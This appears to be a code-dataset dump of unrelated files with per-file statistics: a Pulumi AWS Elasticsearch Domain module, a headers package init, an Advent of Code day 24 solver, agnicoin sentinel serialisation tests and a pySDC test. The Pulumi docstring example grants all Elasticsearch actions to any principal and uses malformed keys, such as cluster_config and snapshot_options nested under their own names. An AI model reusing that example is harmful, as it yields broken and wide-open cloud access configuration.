vpc_id=selected_vpc.id)
current_region = aws.get_region()
current_caller_identity = aws.get_caller_identity()
es_security_group = aws.ec2.SecurityGroup("esSecurityGroup",
description="Managed by Pulumi",
ingress=[{
"cidr_blocks": [selected_vpc.cidr_block],
"from_port": 443,
"protocol": "tcp",
"to_port": 443,
}],
vpc_id=selected_vpc.id)
es_service_linked_role = aws.iam.ServiceLinkedRole("esServiceLinkedRole", aws_service_name="es.amazonaws.com")
es_domain = aws.elasticsearch.Domain("esDomain",
access_policies=f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": "es:*",
"Principal": "*",
"Effect": "Allow",
"Resource": "arn:aws:es:{current_region.name}:{current_caller_identity.account_id}:domain/{domain}/*"
}}
]
}}
\"\"\",
advanced_options={
"rest.action.multi.allow_explicit_index": "true",
},
cluster_config={
"cluster_config": "m4.large.elasticsearch",
},
elasticsearch_version="6.3",
snapshot_options={
"snapshot_options": 23,
},
tags={
"Domain": "TestDomain",
},
vpc_options={
"security_group_ids": [es_security_group.id],
"subnet_ids": [
selected_subnet_ids.ids[0],
selected_subnet_ids.ids[1],
],
})
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[dict] access_policies: IAM policy document specifying the access policies for the domain
:param pulumi.Input[dict] advanced_options: Key-value string pairs to specify advanced configuration options.
Note that the values for these configuration options must be strings (wrapped in quotes) or they
may be wrong and cause a perpetual diff, causing this provider to want to recreate your Elasticsearch
domain on every apply.
:param pulumi.Input[dict] cluster_config: Cluster configuration of the domain, see below.
:param pulumi.Input[dict] domain_endpoint_options: Domain endpoint HTTP(S) related options. See below.
:param pulumi.Input[str] domain_name: Name of the domain.
:param pulumi.Input[dict] ebs_options: EBS related options, may be required based on chosen [instance size](https://aws.amazon.com/elasticsearch-service/pricing/). See below.
:param pulumi.Input[str] elasticsearch_version: The version of Elasticsearch to deploy. Defaults to `1.5`
:param pulumi.Input[dict] encrypt_at_rest: Encrypt at rest options. Only available for [certain instance types](http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/aes-supported-instance-types.html). See below.
:param pulumi.Input[list] log_publishing_options: Options for publishing slow logs to CloudWatch Logs.
:param pulumi.Input[dict] node_to_node_encryption: Node-to-node encryption options. See below.
:param pulumi.Input[dict] snapshot_options: Snapshot related options, see below.
:param pulumi.Input[dict] tags: A map of tags to assign to the resource
:param pulumi.Input[dict] vpc_options: VPC related options, see below. Adding or removing this configuration forces a new resource ([documentation](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-vpc-limitations)).
The **cluster_config** object supports the following:
* `dedicatedMasterCount` (`pulumi.Input[float]`) - Number of dedicated master nodes in the cluster
* `dedicatedMasterEnabled` (`pulumi.Input[bool]`) - Indicates whether dedicated master nodes are enabled for the cluster.
* `dedicatedMasterType` (`pulumi.Input[str]`) - Instance type of the dedicated master nodes in the cluster.
* `instance_count` (`pulumi.Input[float]`) - Number of instances in the cluster.
* `instance_type` (`pulumi.Input[str]`) - Instance type of data nodes in the cluster.
* `warmCount` (`pulumi.Input[float]`) - The number of warm nodes in the cluster. Valid values are between `2` and `150`. `warm_count` can be only and must be set when `warm_enabled` is set to `true`.
* `warmEnabled` (`pulumi.Input[bool]`) - Indicates whether to enable warm storage.
* `warmType` (`pulumi.Input[str]`) - The instance type for the Elasticsearch cluster's warm nodes. Valid values are `ultrawarm1.medium.elasticsearch`, `ultrawarm1.large.elasticsearch` and `ultrawarm1.xlarge.elasticsearch`. `warm_type` can be only and must be set when `warm_enabled` is set to `true`.
* `zoneAwarenessConfig` (`pulumi.Input[dict]`) - Configuration block containing zone awareness settings. Documented below.
* `availabilityZoneCount` (`pulumi.Input[float]`) - Number of Availability Zones for the domain to use with `zone_awareness_enabled`. Defaults to `2`. Valid values: `2` or `3`.
* `zoneAwarenessEnabled` (`pulumi.Input[bool]`) - Indicates whether zone awareness is enabled, set to `true` for multi-az deployment. To enable awareness with three Availability Zones, the `availability_zone_count` within the `zone_awareness_config` must be set to `3`.
The **cognito_options** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `identity_pool_id` (`pulumi.Input[str]`) - ID of the Cognito Identity Pool to use
* `role_arn` (`pulumi.Input[str]`) - ARN of the IAM role that has the AmazonESCognitoAccess policy attached
* `user_pool_id` (`pulumi.Input[str]`) - ID of the Cognito User Pool to use
The **domain_endpoint_options** object supports the following:
* `enforceHttps` (`pulumi.Input[bool]`) - Whether or not to require HTTPS
* `tlsSecurityPolicy` (`pulumi.Input[str]`) - The name of the TLS security policy that needs to be applied to the HTTPS endpoint. Valid values: `Policy-Min-TLS-1-0-2019-07` and `Policy-Min-TLS-1-2-2019-07`. This provider will only perform drift detection if a configuration value is provided.
The **ebs_options** object supports the following:
* `ebsEnabled` (`pulumi.Input[bool]`) - Whether EBS volumes are attached to data nodes in the domain.
* `iops` (`pulumi.Input[float]`) - The baseline input/output (I/O) performance of EBS volumes
attached to data nodes. Applicable only for the Provisioned IOPS EBS volume type.
* `volume_size` (`pulumi.Input[float]`) - The size of EBS volumes attached to data nodes (in GB).
**Required** if `ebs_enabled` is set to `true`.
* `volumeType` (`pulumi.Input[str]`) - The type of EBS volumes attached to data nodes.
The **encrypt_at_rest** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `kms_key_id` (`pulumi.Input[str]`) - The KMS key id to encrypt the Elasticsearch domain with. If not specified then it defaults to using the `aws/es` service KMS key.
The **log_publishing_options** object supports the following:
* `cloudwatch_log_group_arn` (`pulumi.Input[str]`) - ARN of the Cloudwatch log group to which log needs to be published.
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `logType` (`pulumi.Input[str]`) - A type of Elasticsearch log. Valid values: INDEX_SLOW_LOGS, SEARCH_SLOW_LOGS, ES_APPLICATION_LOGS
The **node_to_node_encryption** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
The **snapshot_options** object supports the following:
* `automatedSnapshotStartHour` (`pulumi.Input[float]`) - Hour during which the service takes an automated daily
snapshot of the indices in the domain.
The **vpc_options** object supports the following:
* `availability_zones` (`pulumi.Input[list]`)
* `security_group_ids` (`pulumi.Input[list]`) - List of VPC Security Group IDs to be applied to the Elasticsearch domain endpoints. If omitted, the default Security Group for the VPC will be used.
* `subnet_ids` (`pulumi.Input[list]`) - List of VPC Subnet IDs for the Elasticsearch domain endpoints to be created in.
* `vpc_id` (`pulumi.Input[str]`)
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['access_policies'] = access_policies
__props__['advanced_options'] = advanced_options
__props__['cluster_config'] = cluster_config
__props__['cognito_options'] = cognito_options
__props__['domain_endpoint_options'] = domain_endpoint_options
__props__['domain_name'] = domain_name
__props__['ebs_options'] = ebs_options
__props__['elasticsearch_version'] = elasticsearch_version
__props__['encrypt_at_rest'] = encrypt_at_rest
__props__['log_publishing_options'] = log_publishing_options
__props__['node_to_node_encryption'] = node_to_node_encryption
__props__['snapshot_options'] = snapshot_options
__props__['tags'] = tags
__props__['vpc_options'] = vpc_options
__props__['arn'] = None
__props__['domain_id'] = None
__props__['endpoint'] = None
__props__['kibana_endpoint'] = None
super(Domain, __self__).__init__(
'aws:elasticsearch/domain:Domain',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, access_policies=None, advanced_options=None, arn=None, cluster_config=None, cognito_options=None, domain_endpoint_options=None, domain_id=None, domain_name=None, ebs_options=None, elasticsearch_version=None, encrypt_at_rest=None, endpoint=None, kibana_endpoint=None, log_publishing_options=None, node_to_node_encryption=None, snapshot_options=None, tags=None, vpc_options=None):
"""
Get an existing Domain resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[dict] access_policies: IAM policy document specifying the access policies for the domain
:param pulumi.Input[dict] advanced_options: Key-value string pairs to specify advanced configuration options.
Note that the values for these configuration options must be strings (wrapped in quotes) or they
may be wrong and cause a perpetual diff, causing this provider to want to recreate your Elasticsearch
domain on every apply.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of the domain.
:param pulumi.Input[dict] cluster_config: Cluster configuration of the domain, see below.
:param pulumi.Input[dict] domain_endpoint_options: Domain endpoint HTTP(S) related options. See below.
:param pulumi.Input[str] domain_id: Unique identifier for the domain.
:param pulumi.Input[str] domain_name: Name of the domain.
:param pulumi.Input[dict] ebs_options: EBS related options, may be required based on chosen [instance size](https://aws.amazon.com/elasticsearch-service/pricing/). See below.
:param pulumi.Input[str] elasticsearch_version: The version of Elasticsearch to deploy. Defaults to `1.5`
:param pulumi.Input[dict] encrypt_at_rest: Encrypt at rest options. Only available for [certain instance types](http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/aes-supported-instance-types.html). See below.
:param pulumi.Input[str] endpoint: Domain-specific endpoint used to submit index, search, and data upload requests.
:param pulumi.Input[str] kibana_endpoint: Domain-specific endpoint for kibana without https scheme.
* `vpc_options.0.availability_zones` - If the domain was created inside a VPC, the names of the availability zones the configured `subnet_ids` were created inside.
* `vpc_options.0.vpc_id` - If the domain was created inside a VPC, the ID of the VPC.
:param pulumi.Input[list] log_publishing_options: Options for publishing slow logs to CloudWatch Logs.
:param pulumi.Input[dict] node_to_node_encryption: Node-to-node encryption options. See below.
:param pulumi.Input[dict] snapshot_options: Snapshot related options, see below.
:param pulumi.Input[dict] tags: A map of tags to assign to the resource
:param pulumi.Input[dict] vpc_options: VPC related options, see below. Adding or removing this configuration forces a new resource ([documentation](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-vpc-limitations)).
The **cluster_config** object supports the following:
* `dedicatedMasterCount` (`pulumi.Input[float]`) - Number of dedicated master nodes in the cluster
* `dedicatedMasterEnabled` (`pulumi.Input[bool]`) - Indicates whether dedicated master nodes are enabled for the cluster.
* `dedicatedMasterType` (`pulumi.Input[str]`) - Instance type of the dedicated master nodes in the cluster.
* `instance_count` (`pulumi.Input[float]`) - Number of instances in the cluster.
* `instance_type` (`pulumi.Input[str]`) - Instance type of data nodes in the cluster.
* `warmCount` (`pulumi.Input[float]`) - The number of warm nodes in the cluster. Valid values are between `2` and `150`. `warm_count` can be only and must be set when `warm_enabled` is set to `true`.
* `warmEnabled` (`pulumi.Input[bool]`) - Indicates whether to enable warm storage.
* `warmType` (`pulumi.Input[str]`) - The instance type for the Elasticsearch cluster's warm nodes. Valid values are `ultrawarm1.medium.elasticsearch`, `ultrawarm1.large.elasticsearch` and `ultrawarm1.xlarge.elasticsearch`. `warm_type` can be only and must be set when `warm_enabled` is set to `true`.
* `zoneAwarenessConfig` (`pulumi.Input[dict]`) - Configuration block containing zone awareness settings. Documented below.
* `availabilityZoneCount` (`pulumi.Input[float]`) - Number of Availability Zones for the domain to use with `zone_awareness_enabled`. Defaults to `2`. Valid values: `2` or `3`.
* `zoneAwarenessEnabled` (`pulumi.Input[bool]`) - Indicates whether zone awareness is enabled, set to `true` for multi-az deployment. To enable awareness with three Availability Zones, the `availability_zone_count` within the `zone_awareness_config` must be set to `3`.
The **cognito_options** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `identity_pool_id` (`pulumi.Input[str]`) - ID of the Cognito Identity Pool to use
* `role_arn` (`pulumi.Input[str]`) - ARN of the IAM role that has the AmazonESCognitoAccess policy attached
* `user_pool_id` (`pulumi.Input[str]`) - ID of the Cognito User Pool to use
The **domain_endpoint_options** object supports the following:
* `enforceHttps` (`pulumi.Input[bool]`) - Whether or not to require HTTPS
* `tlsSecurityPolicy` (`pulumi.Input[str]`) - The name of the TLS security policy that needs to be applied to the HTTPS endpoint. Valid values: `Policy-Min-TLS-1-0-2019-07` and `Policy-Min-TLS-1-2-2019-07`. This provider will only perform drift detection if a configuration value is provided.
The **ebs_options** object supports the following:
* `ebsEnabled` (`pulumi.Input[bool]`) - Whether EBS volumes are attached to data nodes in the domain.
* `iops` (`pulumi.Input[float]`) - The baseline input/output (I/O) performance of EBS volumes
attached to data nodes. Applicable only for the Provisioned IOPS EBS volume type.
* `volume_size` (`pulumi.Input[float]`) - The size of EBS volumes attached to data nodes (in GB).
**Required** if `ebs_enabled` is set to `true`.
* `volumeType` (`pulumi.Input[str]`) - The type of EBS volumes attached to data nodes.
The **encrypt_at_rest** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `kms_key_id` (`pulumi.Input[str]`) - The KMS key id to encrypt the Elasticsearch domain with. If not specified then it defaults to using the `aws/es` service KMS key.
The **log_publishing_options** object supports the following:
* `cloudwatch_log_group_arn` (`pulumi.Input[str]`) - ARN of the Cloudwatch log group to which log needs to be published.
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `logType` (`pulumi.Input[str]`) - A type of Elasticsearch log. Valid values: INDEX_SLOW_LOGS, SEARCH_SLOW_LOGS, ES_APPLICATION_LOGS
The **node_to_node_encryption** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
The **snapshot_options** object supports the following:
* `automatedSnapshotStartHour` (`pulumi.Input[float]`) - Hour during which the service takes an automated daily
snapshot of the indices in the domain.
The **vpc_options** object supports the following:
* `availability_zones` (`pulumi.Input[list]`)
* `security_group_ids` (`pulumi.Input[list]`) - List of VPC Security Group IDs to be applied to the Elasticsearch domain endpoints. If omitted, the default Security Group for the VPC will be used.
* `subnet_ids` (`pulumi.Input[list]`) - List of VPC Subnet IDs for the Elasticsearch domain endpoints to be created in.
* `vpc_id` (`pulumi.Input[str]`)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["access_policies"] = access_policies
__props__["advanced_options"] = advanced_options
__props__["arn"] = arn
__props__["cluster_config"] = cluster_config
__props__["cognito_options"] = cognito_options
__props__["domain_endpoint_options"] = domain_endpoint_options
__props__["domain_id"] = domain_id
__props__["domain_name"] = domain_name
__props__["ebs_options"] = ebs_options
__props__["elasticsearch_version"] = elasticsearch_version
__props__["encrypt_at_rest"] = encrypt_at_rest
__props__["endpoint"] = endpoint
__props__["kibana_endpoint"] = kibana_endpoint
__props__["log_publishing_options"] = log_publishing_options
__props__["node_to_node_encryption"] = node_to_node_encryption
__props__["snapshot_options"] = snapshot_options
__props__["tags"] = tags
__props__["vpc_options"] = vpc_options
return Domain(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 58.899811
| 420
| 0.671673
| 3,868
| 31,158
| 5.243537
| 0.100052
| 0.050981
| 0.022089
| 0.019722
| 0.844148
| 0.828962
| 0.823094
| 0.814417
| 0.792871
| 0.784637
| 0
| 0.006214
| 0.230406
| 31,158
| 528
| 421
| 59.011364
| 0.83961
| 0.584986
| 0
| 0.021739
| 1
| 0
| 0.150958
| 0.040038
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0.01087
| 0.065217
| 0.021739
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bff1e76ad164593084fbefad95a83b162df75c01
| 146
|
py
|
Python
|
headers/__init__.py
|
kirsn/py-message-headers
|
3b79ce640823940552ed146d2171d4cd42c0796f
|
[
"MIT"
] | null | null | null |
headers/__init__.py
|
kirsn/py-message-headers
|
3b79ce640823940552ed146d2171d4cd42c0796f
|
[
"MIT"
] | null | null | null |
headers/__init__.py
|
kirsn/py-message-headers
|
3b79ce640823940552ed146d2171d4cd42c0796f
|
[
"MIT"
] | null | null | null |
# Generated on 2019-02-03T13:03:06.509000
# Re-export every header definition from the sibling generated modules.
# NOTE(review): these look like Python 2 implicit relative imports of package
# siblings; on Python 3, `from http import *` resolves to the stdlib `http`
# package instead -- confirm the intended targets.
from mail import *
from http import *
from mime import *
from netnews import *
# Date-stamped version of this generated package.
VERSION = "2019.02.03"
| 16.222222
| 41
| 0.726027
| 24
| 146
| 4.416667
| 0.625
| 0.283019
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.231405
| 0.171233
| 146
| 8
| 42
| 18.25
| 0.644628
| 0.267123
| 0
| 0
| 1
| 0
| 0.095238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
87110101c9c5ee27236ce6b3089b5d3a46c48b32
| 3,257
|
py
|
Python
|
2021/24/f.py
|
kristianwiklund/AOC2019
|
a98affaccd53ca4ea2d3a8c3fa125680f1e8cc08
|
[
"MIT"
] | 3
|
2020-12-02T18:18:05.000Z
|
2021-12-03T18:39:26.000Z
|
2021/24/f.py
|
kristianwiklund/AOC2019
|
a98affaccd53ca4ea2d3a8c3fa125680f1e8cc08
|
[
"MIT"
] | null | null | null |
2021/24/f.py
|
kristianwiklund/AOC2019
|
a98affaccd53ca4ea2d3a8c3fa125680f1e8cc08
|
[
"MIT"
] | null | null | null |
def _monad_step(s, z, z_div, x_add, y_add):
    """Evaluate one MONAD instruction block (AoC 2021 day 24 ALU program).

    All of the i0..i13 functions below run the exact same instruction
    sequence and differ only in three embedded constants, so they all
    delegate to this helper instead of repeating 20 near-identical lines.

    :param s: input digit for the block (loaded into register w).
    :param z: accumulator carried in from the previous block.
    :param z_div: 1 or 26 -- whether a base-26 "digit" is popped off z.
    :param x_add: offset added to ``z % 26`` before comparing with the input.
    :param y_add: offset added to the input when it is pushed onto z.
    :return: the ``(w, x, y, z)`` register tuple, identical to the originals.
    """
    w = s
    # The original code computes `eql x w` and then inverts it, so x ends up
    # 0 when the comparison matches and 1 otherwise.
    x = 0 if (z % 26) + x_add == w else 1
    z //= z_div
    # y's final value in the original program is (w + y_add) * x; the
    # intermediate y = 25 * x + 1 only scales z and is folded in below.
    y = (w + y_add) * x
    z = z * (25 * x + 1) + y
    return (w, x, y, z)


def f(s):
    """Scaffold block: ignores its input and returns zeroed registers."""
    w = 0
    x = 0
    y = 0
    z = 0
    return (w, x, y, z)


def i0(s, w, x, y, z):
    """Digit 1: push (z_div=1, x_add=14, y_add=7); w/x/y inputs are unused."""
    return _monad_step(s, z, 1, 14, 7)


def i1(s, w, x, y, z):
    """Digit 2: push (z_div=1, x_add=12, y_add=4)."""
    return _monad_step(s, z, 1, 12, 4)


def i2(s, w, x, y, z):
    """Digit 3: push (z_div=1, x_add=11, y_add=8)."""
    return _monad_step(s, z, 1, 11, 8)


def i3(s, w, x, y, z):
    """Digit 4: pop (z_div=26, x_add=-4, y_add=1)."""
    return _monad_step(s, z, 26, -4, 1)


def i4(s, w, x, y, z):
    """Digit 5: push (z_div=1, x_add=10, y_add=5)."""
    return _monad_step(s, z, 1, 10, 5)


def i5(s, w, x, y, z):
    """Digit 6: push (z_div=1, x_add=10, y_add=14)."""
    return _monad_step(s, z, 1, 10, 14)


def i6(s, w, x, y, z):
    """Digit 7: push (z_div=1, x_add=15, y_add=12)."""
    return _monad_step(s, z, 1, 15, 12)


def i7(s, w, x, y, z):
    """Digit 8: pop (z_div=26, x_add=-9, y_add=10)."""
    return _monad_step(s, z, 26, -9, 10)


def i8(s, w, x, y, z):
    """Digit 9: pop (z_div=26, x_add=-9, y_add=5)."""
    return _monad_step(s, z, 26, -9, 5)


def i9(s, w, x, y, z):
    """Digit 10: push (z_div=1, x_add=12, y_add=7)."""
    return _monad_step(s, z, 1, 12, 7)


def i10(s, w, x, y, z):
    """Digit 11: pop (z_div=26, x_add=-15, y_add=6)."""
    return _monad_step(s, z, 26, -15, 6)


def i11(s, w, x, y, z):
    """Digit 12: pop (z_div=26, x_add=-7, y_add=8)."""
    return _monad_step(s, z, 26, -7, 8)


def i12(s, w, x, y, z):
    """Digit 13: pop (z_div=26, x_add=-10, y_add=4)."""
    return _monad_step(s, z, 26, -10, 4)


def i13(s, w, x, y, z):
    """Digit 14: pop (z_div=26, x_add=0, y_add=6); the original block has
    no `add x N` after the modulus, i.e. an offset of 0."""
    return _monad_step(s, z, 26, 0, 6)
| 10.820598
| 21
| 0.34019
| 826
| 3,257
| 1.341404
| 0.047216
| 0.077617
| 0.07852
| 0.104693
| 0.947653
| 0.947653
| 0.935921
| 0.935921
| 0.935921
| 0.935921
| 0
| 0.132597
| 0.388701
| 3,257
| 300
| 22
| 10.856667
| 0.423908
| 0
| 0
| 0.898246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0
| 0
| 0.105263
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
871b3accc6c40aff90b2dbcbc165d7fcb48b65b2
| 4,394
|
py
|
Python
|
test/unit/test_agnid_data_shims.py
|
agnicoin/sentinel
|
daba451c9e3057e2822eb5569cc031383accd7e5
|
[
"MIT"
] | null | null | null |
test/unit/test_agnid_data_shims.py
|
agnicoin/sentinel
|
daba451c9e3057e2822eb5569cc031383accd7e5
|
[
"MIT"
] | null | null | null |
test/unit/test_agnid_data_shims.py
|
agnicoin/sentinel
|
daba451c9e3057e2822eb5569cc031383accd7e5
|
[
"MIT"
] | null | null | null |
import pytest
import sys
import os

# Point the sentinel config at the test fixture and make ../../lib importable
# BEFORE importing agnilib -- presumably agnilib reads SENTINEL_CONFIG at
# import time; confirm against lib/agnilib.
os.environ['SENTINEL_CONFIG'] = os.path.normpath(os.path.join(os.path.dirname(__file__), '../test_sentinel.conf'))
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../../lib')))

import agnilib
@pytest.fixture
def sentinel_proposal_hex():
    """Hex-encoded proposal in sentinel's serialisation (the payload starts
    with hex 5b22 = '["' -- a single outer list). Compared byte-exactly."""
    return '5b2270726f706f73616c222c207b22656e645f65706f6368223a20313439313032323830302c20226e616d65223a2022626565722d7265696d62757273656d656e742d37222c20227061796d656e745f61646472657373223a2022795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e74223a20372e30303030303030302c202273746172745f65706f6368223a20313438333235303430302c202275726c223a202268747470733a2f2f6461736863656e7472616c2e636f6d2f626565722d7265696d62757273656d656e742d37227d5d'


@pytest.fixture
def sentinel_superblock_hex():
    """Hex-encoded superblock in sentinel's serialisation (single outer list)."""
    return '5b227375706572626c6f636b222c207b226576656e745f626c6f636b5f686569676874223a2036323530302c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795443363268755234595145506e39414a486a6e517878726548536267416f617456222c20227061796d656e745f616d6f756e7473223a2022357c33227d5d'


@pytest.fixture
def agnid_proposal_hex():
    """Hex-encoded proposal as agnid serialises it (starts with 5b5b = '[['
    -- an extra wrapping list compared to the sentinel form)."""
    return '5b5b2270726f706f73616c222c207b22656e645f65706f6368223a20313439313336383430302c20226e616d65223a2022626565722d7265696d62757273656d656e742d39222c20227061796d656e745f61646472657373223a2022795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e74223a2034392e30303030303030302c202273746172745f65706f6368223a20313438333235303430302c202274797065223a20312c202275726c223a202268747470733a2f2f7777772e6461736863656e7472616c2e6f72672f702f626565722d7265696d62757273656d656e742d39227d5d5d'


@pytest.fixture
def agnid_superblock_hex():
    """Hex-encoded superblock ('trigger') as agnid serialises it (extra
    wrapping list, 5b5b...5d5d)."""
    return '5b5b2274726967676572222c207b226576656e745f626c6f636b5f686569676874223a2036323530302c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795443363268755234595145506e39414a486a6e517878726548536267416f617456222c20227061796d656e745f616d6f756e7473223a2022357c33222c202274797065223a20327d5d5d'
# ========================================================================


def test_SHIM_deserialise_from_agnid(agnid_proposal_hex, agnid_superblock_hex):
    """Deserialising agnid-side hex must yield the sentinel-side encoding;
    the expected values are byte-exact known-good payloads."""
    assert agnilib.SHIM_deserialise_from_agnid(agnid_proposal_hex) == '5b2270726f706f73616c222c207b22656e645f65706f6368223a20313439313336383430302c20226e616d65223a2022626565722d7265696d62757273656d656e742d39222c20227061796d656e745f61646472657373223a2022795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e74223a2034392e30303030303030302c202273746172745f65706f6368223a20313438333235303430302c202275726c223a202268747470733a2f2f7777772e6461736863656e7472616c2e6f72672f702f626565722d7265696d62757273656d656e742d39227d5d'
    assert agnilib.SHIM_deserialise_from_agnid(agnid_superblock_hex) == '5b227375706572626c6f636b222c207b226576656e745f626c6f636b5f686569676874223a2036323530302c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795443363268755234595145506e39414a486a6e517878726548536267416f617456222c20227061796d656e745f616d6f756e7473223a2022357c33227d5d'


def test_SHIM_serialise_for_agnid(sentinel_proposal_hex, sentinel_superblock_hex):
    """Serialising sentinel-side hex must yield the agnid-side encoding
    (note the extra outer list, 5b5b...5d5d, in the expected values)."""
    assert agnilib.SHIM_serialise_for_agnid(sentinel_proposal_hex) == '5b5b2270726f706f73616c222c207b22656e645f65706f6368223a20313439313032323830302c20226e616d65223a2022626565722d7265696d62757273656d656e742d37222c20227061796d656e745f61646472657373223a2022795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e74223a20372e30303030303030302c202273746172745f65706f6368223a20313438333235303430302c202274797065223a20312c202275726c223a202268747470733a2f2f6461736863656e7472616c2e636f6d2f626565722d7265696d62757273656d656e742d37227d5d5d'
    assert agnilib.SHIM_serialise_for_agnid(sentinel_superblock_hex) == '5b5b2274726967676572222c207b226576656e745f626c6f636b5f686569676874223a2036323530302c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795443363268755234595145506e39414a486a6e517878726548536267416f617456222c20227061796d656e745f616d6f756e7473223a2022357c33222c202274797065223a20327d5d5d'
| 112.666667
| 578
| 0.934001
| 135
| 4,394
| 30
| 0.266667
| 0.008889
| 0.015802
| 0.017778
| 0.093333
| 0.086914
| 0.086914
| 0.020247
| 0.020247
| 0.020247
| 0
| 0.69168
| 0.023441
| 4,394
| 38
| 579
| 115.631579
| 0.252156
| 0.016386
| 0
| 0.166667
| 0
| 0
| 0.788194
| 0.782639
| 0
| 1
| 0
| 0
| 0.166667
| 1
| 0.25
| false
| 0
| 0.166667
| 0.166667
| 0.583333
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
871db1c051d4e33e4b07858b334b3ece868979bd
| 135
|
py
|
Python
|
pySDC/tests/test_projects/test_SDC_showdown/test_grayscott.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 20
|
2015-03-21T09:02:55.000Z
|
2022-02-26T20:22:21.000Z
|
pySDC/tests/test_projects/test_SDC_showdown/test_grayscott.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 61
|
2015-03-02T09:35:55.000Z
|
2022-03-17T12:42:48.000Z
|
pySDC/tests/test_projects/test_SDC_showdown/test_grayscott.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 19
|
2015-02-20T11:52:33.000Z
|
2022-02-02T10:46:27.000Z
|
from pySDC.projects.SDC_showdown.SDC_timing_GrayScott import main
def test_grayscott():
    """Smoke-test the SDC Gray-Scott timing script: run its main() with the
    working directory it expects (relative to the repository root)."""
    project_dir = 'pySDC/projects/SDC_showdown/'
    main(cwd=project_dir)
| 22.5
| 65
| 0.8
| 19
| 135
| 5.421053
| 0.631579
| 0.252427
| 0.31068
| 0.466019
| 0
| 0
| 0
| 0
